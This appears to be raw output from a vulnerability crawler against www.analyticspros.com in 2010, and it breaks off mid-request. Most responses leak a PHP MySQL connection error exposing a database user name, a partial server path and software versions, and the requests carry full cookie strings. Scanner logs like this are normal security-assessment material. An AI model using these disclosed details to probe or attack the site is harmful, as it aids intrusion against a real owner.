GET /blog/seo.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/consulting.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:28:56 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
GET /blog/seo/ HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 04:07:46 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
GET /blog/urchin.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/consulting.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Fri, 05 Nov 2010 23:36:50 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
GET /blog/urchin/118-urchin-7-now-available.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Fri, 05 Nov 2010 23:36:48 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
GET /blog/webanalytics.feed HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:19:40 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
GET /component/content/article/62-urchin/ HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 05:00:21 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
GET /component/jsetup/comment/ HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 04:44:28 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
GET /component/jsetup/comment/add.html?commenttype=20&etid=46&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fY29udGVudCZlaWQ9QXJyYXkmSXRlbWlkPTYwJmZvcm1hdD1odG1sJnZpZXc9YXJ0aWNsZSZpZD00NiZsYXlvdXQ9ZGVmYXVsdCZjb21tZW50dHlwZT0yMA%3D%3D HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/consulting.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 08:03:26 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
GET /component/jsetup/comment/function.mysql-connect HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/component/jsetup/comment/add.html?commenttype=20&etid=90&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fY29udGVudCZlaWQ9QXJyYXkmSXRlbWlkPTY2Jml0ZW1pZD03MCZmb3JtYXQ9aHRtbCZpZD05MDphbmFseXRpY3MtdG9vbGJhciZ2aWV3PWFydGljbGUmbGF5b3V0PWRlZmF1bHQmY29tbWVudHR5cGU9MjA%3D Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 404 Not Found Date: Sat, 06 Nov 2010 04:44:28 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
GET /index.php?option=com_jsetup&controller=comment&task=add&commenttype=20&etid=51&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fY29udGVudCZlaWQ9QXJyYXkmSXRlbWlkPTY0JmZvcm1hdD1odG1sJnZpZXc9YXJ0aWNsZSZpZD01MSZsYXlvdXQ9ZGVmYXVsdCZjb21tZW50dHlwZT0yMA==&format=html&titleheader=[ New ] HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=7063cf4cbe882e4e5fe4d39e1b4cc265; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_s=10372%3A4.0.0.0%3B11406%3A5.0.0.0; ki_t=1288999540201%3B1288999540201%3B1289012136505%3B1%3B25; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; __utma=26076141.293438870.1288999539.1289004379.1289009947.3; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.50.9.1289011092224; __utmmobile=0xade0ac5896f84b3c;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 08:26:36 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
GET /products/63-urchin/119-urchin-6.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Fri, 05 Nov 2010 23:33:24 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
GET /products/63-urchin/120-buy-urchin-7-or-upgrade.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/products.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:34:49 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
GET /products/63-urchin/70-urchin.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:38:23 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
GET /products/65-ae/function.mysql-connect HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/products/65-ae/ Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response
HTTP/1.1 404 Not Found Date: Sat, 06 Nov 2010 04:24:32 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
GET /products/analytics-engine.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/consulting.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 04:21:13 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
GET /resources/feeds/34-gaac-blogs/ HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:57:01 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
GET /resources/feeds/34-gaac-blogs/13-portent-interactive-blog.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/resources/feeds/34-gaac-blogs.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 08:00:17 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
GET /resources/feeds/34-gaac-blogs/15-roi-revolution-blog.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/resources/feeds/34-gaac-blogs.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:59:33 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
GET /resources/feeds/34-gaac-blogs/16-vki-studios-blog.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/resources/feeds/34-gaac-blogs.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; 